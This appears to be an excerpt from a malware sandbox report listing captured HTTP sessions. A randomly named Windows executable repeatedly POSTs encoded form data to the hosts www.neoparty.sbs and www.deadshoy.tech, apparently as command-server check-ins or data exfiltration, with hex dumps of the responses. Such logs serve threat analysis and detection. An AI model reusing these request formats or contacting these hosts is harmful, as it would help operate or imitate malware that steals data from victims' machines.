                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 48 59 45 74 32 45 66 39 67 37 6f 2b 2b 6b 6d 62 74 34 38 53 65 68 76 52 6f 79 34 46 6c 6b 57 77 6b 66 49 31 6c 4b 54 46 39 36 4d 6e 4d 31 53 4a 31 48 65 64 5a 65 4c 67 38 73 67 62 4b 46 49 4c 56 45 57 4a 74 5a 65 71 4d 2b 58 6c 57 61 74 56 31 42 77 6c 7a 54 72 62 4f 49 5a 53 6e 47 63 76 78 7a 50 6a 56 30 74 4d 41 2b 4c 31 34 6e 6a 56 47 70 37 52 7a 33 76 41 39 34 6b 74 47 79 2f 79 38 6e 49 64 52 2f 33 74 48 55 30 76 79 67 79 35 6e 2f 4f 32 67 58 59 72 52 2b 42 57 70 67 79 33 6a 70 66 6d 6d 62 38 50 55 55 73 70 67 71 47 73 62 38 41 6f 74 47 56 33 33 4d 76 4c 53 37 56 47 41 46 46 43 33 79 50 68 4a 30 32 32
                                                                                          Data Ascii: T4OdNH=HYEt2Ef9g7o++kmbt48SehvRoy4FlkWwkfI1lKTF96MnM1SJ1HedZeLg8sgbKFILVEWJtZeqM+XlWatV1BwlzTrbOIZSnGcvxzPjV0tMA+L14njVGp7Rz3vA94ktGy/y8nIdR/3tHU0vygy5n/O2gXYrR+BWpgy3jpfmmb8PUUspgqGsb8AotGV33MvLS7VGAFFC3yPhJ022
                                                                                          Jan 8, 2025 15:00:20.489952087 CET1236INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:00:20 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          x-turbo-charged-by: LiteSpeed
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AaU4ivDhT3Zk%2F51rHf1hPzSr4Fak1GDP482%2BlcL63VV8jGbPRNV6RNT%2BcDUzDQSD%2F9jAxGByox3KXcVHsRaltKQ3bTQgyHvD4ZU5YoHTdxYGxfD92mHkYcT5HTg4ucjsFsT%2B"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fecb6945e944352-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb
                                                                                          Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mq
                                                                                          Jan 8, 2025 15:00:20.489974022 CET184INData Raw: 04 c6 13 0b a5 69 67 0a 68 d0 30 ba 12 66 ed 8b f7 69 3a 9e ce 2d 08 8d 1d 17 20 f2 c5 39 5a 4f 4c d6 14 6a eb ad 9e 18 4b 60 3b 16 70 13 aa cc a1 b7 e9 55 e0 06 cf 4b f6 d9 b9 e2 8b 26 10 44 11 9e fe 60 91 dd ce b0 9a 0c be 30 5e 5c 73 cc 71 71
                                                                                          Data Ascii: igh0fi:- 9ZOLjK`;pUK&D`0^\sqqmn\&}TA/4;/#9w=Co'=ct2l;[d#t{0_x%,0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.649986104.21.53.168802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:00:22.138329983 CET790OUTPOST /qc6u/ HTTP/1.1
                                                                                          Host: www.neoparty.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.neoparty.sbs
                                                                                          Referer: http://www.neoparty.sbs/qc6u/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 48 59 45 74 32 45 66 39 67 37 6f 2b 2f 45 57 62 6f 5a 38 53 4a 52 76 65 6b 53 34 46 33 6b 57 30 6b 66 30 31 6c 50 71 65 38 4d 63 6e 4d 58 61 4a 79 47 65 64 65 65 4c 67 6f 63 67 44 4f 46 49 56 56 45 62 36 74 5a 53 71 4d 34 37 6c 57 5a 35 56 31 77 77 6b 7a 44 72 64 46 6f 5a 51 70 6d 63 76 78 7a 50 6a 56 30 34 5a 41 2f 6a 31 35 55 72 56 55 59 37 51 74 48 76 44 2b 34 6b 74 58 69 2f 2b 38 6e 49 76 52 36 57 4b 48 53 34 76 79 6c 4f 35 6e 74 6d 31 72 58 59 70 4a 65 41 68 70 77 2f 41 67 36 2b 32 6f 49 73 46 55 57 49 61 68 63 62 32 48 50 41 4c 2f 57 31 31 33 4f 33 35 53 62 56 73 43 46 39 43 6c 6c 44 47 47 41 54 56 7a 78 6c 43 44 50 53 2b 6a 51 70 53 6b 39 4d 56 75 6d 76 57 6d 51 3d 3d
                                                                                          Data Ascii: T4OdNH=HYEt2Ef9g7o+/EWboZ8SJRvekS4F3kW0kf01lPqe8McnMXaJyGedeeLgocgDOFIVVEb6tZSqM47lWZ5V1wwkzDrdFoZQpmcvxzPjV04ZA/j15UrVUY7QtHvD+4ktXi/+8nIvR6WKHS4vylO5ntm1rXYpJeAhpw/Ag6+2oIsFUWIahcb2HPAL/W113O35SbVsCF9CllDGGATVzxlCDPS+jQpSk9MVumvWmQ==
                                                                                          Jan 8, 2025 15:00:23.116576910 CET1236INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:00:23 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          x-turbo-charged-by: LiteSpeed
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RcRaYP8bJSkzgoPI9TPBNaZcrk9W%2FZKNpXuxNTWl61TLdRYaAlytSwhXAF4Z1UGZ4AQoS14pJwZ7j14t735VNo3AYRSHq1gVrGN3mM2JlWx1XkIQzkySW3BdENsnuAHJrEUv"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fecb6a4dd968c36-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2099&min_rtt=2099&rtt_var=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5 69 67
                                                                                          Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mqig
                                                                                          Jan 8, 2025 15:00:23.116591930 CET177INData Raw: 0a 68 d0 30 ba 12 66 ed 8b f7 69 3a 9e ce 2d 08 8d 1d 17 20 f2 c5 39 5a 4f 4c d6 14 6a eb ad 9e 18 4b 60 3b 16 70 13 aa cc a1 b7 e9 55 e0 06 cf 4b f6 d9 b9 e2 8b 26 10 44 11 9e fe 60 91 dd ce b0 9a 0c be 30 5e 5c 73 cc 71 71 6d ad 6e cb b8 ce d3
                                                                                          Data Ascii: h0fi:- 9ZOLjK`;pUK&D`0^\sqqmn\&}TA/4;/#9w=Co'=ct2l;[d#t{0_x%,0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.649987104.21.53.168802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:00:24.685410023 CET1803OUTPOST /qc6u/ HTTP/1.1
                                                                                          Host: www.neoparty.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.neoparty.sbs
                                                                                          Referer: http://www.neoparty.sbs/qc6u/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 48 59 45 74 32 45 66 39 67 37 6f 2b 2f 45 57 62 6f 5a 38 53 4a 52 76 65 6b 53 34 46 33 6b 57 30 6b 66 30 31 6c 50 71 65 38 4d 55 6e 4d 45 43 4a 79 6c 47 64 66 65 4c 67 30 4d 67 58 4f 46 4a 51 56 45 53 53 74 5a 4f 55 4d 39 6e 6c 56 35 6c 56 6c 43 49 6b 35 44 72 64 4b 49 5a 52 6e 47 63 66 78 79 2b 4c 56 33 41 5a 41 2f 6a 31 35 56 37 56 57 4a 37 51 76 48 76 41 39 34 6b 68 47 79 2f 53 38 6e 42 59 52 36 62 39 48 69 59 76 79 46 2b 35 6c 59 36 31 33 48 59 76 63 65 41 35 70 77 7a 66 67 36 69 36 6f 4a 6f 38 55 56 55 61 67 71 65 70 54 50 30 4a 70 58 4a 72 75 70 4c 2f 54 75 52 77 4b 6d 56 6c 72 7a 4b 30 50 78 32 35 7a 48 5a 76 50 64 48 76 70 47 41 37 71 36 55 43 75 31 4b 50 6b 4f 69 65 56 78 57 2b 4a 59 31 2b 2b 48 42 65 73 57 63 33 55 31 6f 39 32 4e 77 4c 44 43 51 6c 6b 51 6f 6a 56 68 5a 61 37 6d 38 54 72 50 62 6b 35 6b 30 2b 4d 57 6c 6a 70 56 46 37 55 54 68 45 76 2b 58 46 39 77 53 7a 4a 75 77 4c 2b 54 64 70 50 47 75 31 70 4c 49 69 35 72 48 55 43 66 38 51 6a 71 59 68 4e 64 53 4c 6a 75 76 [TRUNCATED]
                                                                                          Data Ascii: T4OdNH=HYEt2Ef9g7o+/EWboZ8SJRvekS4F3kW0kf01lPqe8MUnMECJylGdfeLg0MgXOFJQVESStZOUM9nlV5lVlCIk5DrdKIZRnGcfxy+LV3AZA/j15V7VWJ7QvHvA94khGy/S8nBYR6b9HiYvyF+5lY613HYvceA5pwzfg6i6oJo8UVUagqepTP0JpXJrupL/TuRwKmVlrzK0Px25zHZvPdHvpGA7q6UCu1KPkOieVxW+JY1++HBesWc3U1o92NwLDCQlkQojVhZa7m8TrPbk5k0+MWljpVF7UThEv+XF9wSzJuwL+TdpPGu1pLIi5rHUCf8QjqYhNdSLjuvxrefGUbdKPi7bn82+B4RA8YrHNb62H5dCi4y6I3a7geUwMVCzi7aNZ++iMgoEKAcGQdbL/v2XD0GOEt6fky7TCvLj8wbyUKjCa8r1kvvzLEkIQz4zREf0Y+u1Xvc+ou4deSIrpaOgzMsmcxxCc695042ecwG8m3GVupIk7NzVf+QEYPBNsJvfMnIK2R0sgVjCzW/4dGSQzdF0lqDp86zU+OHRGfC8IGXTW2arOqQNw/HxNOUFhVUzklvadjzd8gyOAFK3MmPOQ4I+UrBZDK0KJ+493dx5tlWCWETsx2D4cRyuF67kg2TCyZVAzlyBNxKlTrDD23cRcCrdPUwLmwwR8vwKUlaTXSH/LTWengFOUSG0/pq1P8j12xbSYK9xNCscsRpyNDQIma3odwjC0SY3Ysohgv337l8wVv7Sklvcryyslw6+SPsYrBupYyGPa93IGNtaRt4ljl8ZfP5/pTmmpXPnQUQ4yNDOprfAttoJyXVK9y9Nq9rh1CZcHoDf9f0EkCoXIDngL19IPszWrFgRgTRXdjnhBwww3w1f1KQ4pq5cqogMjNrxV/TgyZA3Kp446pyJeWOSeRU4rQJHO9Ev6NDlM+E/aIYzUi1Gp6UhEpw72513VXSj+Qoa3xstEjEL19GeTPmfv743lGFfsfRKU45zAhUR2rm7d [TRUNCATED]
                                                                                          Jan 8, 2025 15:00:25.668557882 CET1236INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:00:25 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          x-turbo-charged-by: LiteSpeed
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dA%2FAZWuktk9Vvgk7sfckn0q1xxlnfdMsRdX%2FMLqDbMeTMoHkMWImAW%2BD7VL2vAW6Je6m8uEgq0yWxmWQ%2Bi%2FcZ8aF9yiQ7%2BXyiIfxGytkl%2FNBIxacab83Px%2B8U%2B30GraM9wxK"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fecb6b4cb400f68-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1481&rtt_var=740&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1803&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09
                                                                                          Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?m
                                                                                          Jan 8, 2025 15:00:25.668572903 CET193INData Raw: 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5 69 67 0a 68 d0 30 ba 12 66 ed 8b f7 69 3a 9e ce 2d 08 8d 1d 17 20 f2 c5 39 5a 4f 4c d6 14 6a eb ad 9e 18 4b 60 3b 16 70 13 aa cc a1 b7 e9 55 e0 06 cf 4b f6 d9 b9 e2 8b 26 10 44 11 9e fe 60 91 dd ce b0 9a
                                                                                          Data Ascii: qigh0fi:- 9ZOLjK`;pUK&D`0^\sqqmn\&}TA/4;/#9w=Co'=ct2l;[d#t{0_x%,0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.649988104.21.53.168802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:00:27.226830959 CET513OUTGET /qc6u/?T4OdNH=KasN1xnr6qxo50+siIN0KAfRtD0D1F2Xjd0YqYDU3pURb3uX+HWLUZelx9Jnej1VJkKFsqm6fN7HUYc3wzos1lmCBt8frBU6tWvEY3xAPNLu5kbYSa6DvHLcvpdXX1zJ5HhRaag=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.neoparty.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:00:28.199692011 CET1236INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:00:28 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          x-turbo-charged-by: LiteSpeed
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0jUdTiXa%2FTlIMs2OPDEwD2jTHEdmRyAzvYleTLMiJLtrQ6vv9ud41Kefx9QaFLyoSDH2nlHcKsLEPEP9SbUwFckmuFYWdYP9%2BEo82neC9Sr2ZRUqp7aefTiKYOMahMmu6qzI"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fecb6c4ae8f4408-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=513&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 33 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED]
                                                                                          Data Ascii: 31c<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans
                                                                                          Jan 8, 2025 15:00:28.199707985 CET457INData Raw: 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74
                                                                                          Data Ascii: -serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:1


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          13192.168.2.649989199.59.243.228802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:00:41.396032095 CET769OUTPOST /m5bf/ HTTP/1.1
                                                                                          Host: www.deadshoy.tech
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.deadshoy.tech
                                                                                          Referer: http://www.deadshoy.tech/m5bf/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 49 49 7a 38 77 74 76 73 79 38 73 51 44 68 41 78 6a 52 72 37 46 7a 51 4c 61 59 6b 73 6e 5a 35 6d 6f 49 42 77 6c 62 50 49 71 39 67 5a 30 4d 53 6e 57 51 61 55 33 69 62 6b 56 4e 51 2b 69 6c 63 76 75 76 79 38 4e 32 76 58 30 67 75 30 6d 52 41 77 72 30 65 74 48 76 51 46 4d 36 50 73 51 32 4e 79 71 63 34 36 56 58 79 62 44 75 35 74 7a 39 43 37 50 62 74 53 48 59 57 74 59 6d 32 35 72 34 67 35 75 66 70 65 44 30 74 65 39 48 76 35 4f 6e 68 58 4d 51 4d 31 6b 30 42 5a 72 39 6d 50 2f 49 33 5a 73 66 75 75 6b 61 69 6b 52 32 48 2f 75 75 6c 76 4b 73 75 46 4c 4d 33 5a 36 6f 58 51 78 78 4a 48 4e 55 6b 7a 72 63 75 2b 77 73 78 52
                                                                                          Data Ascii: T4OdNH=IIz8wtvsy8sQDhAxjRr7FzQLaYksnZ5moIBwlbPIq9gZ0MSnWQaU3ibkVNQ+ilcvuvy8N2vX0gu0mRAwr0etHvQFM6PsQ2Nyqc46VXybDu5tz9C7PbtSHYWtYm25r4g5ufpeD0te9Hv5OnhXMQM1k0BZr9mP/I3ZsfuukaikR2H/uulvKsuFLM3Z6oXQxxJHNUkzrcu+wsxR
                                                                                          Jan 8, 2025 15:00:41.857542992 CET1236INHTTP/1.1 200 OK
                                                                                          date: Wed, 08 Jan 2025 14:00:41 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          content-length: 1118
                                                                                          x-request-id: 66005974-c4de-4433-ad31-d3c07f856ebf
                                                                                          cache-control: no-store, max-age=0
                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LOCt7JwxCTxxZd4RbjOpBmmyKMo1FeOAvVS844oeWwJ8KkWpcJyZXiZWjv/+/AS+I4jlGZ3EUD707vhlzRkiqQ==
                                                                                          set-cookie: parking_session=66005974-c4de-4433-ad31-d3c07f856ebf; expires=Wed, 08 Jan 2025 14:15:41 GMT; path=/
                                                                                          connection: close
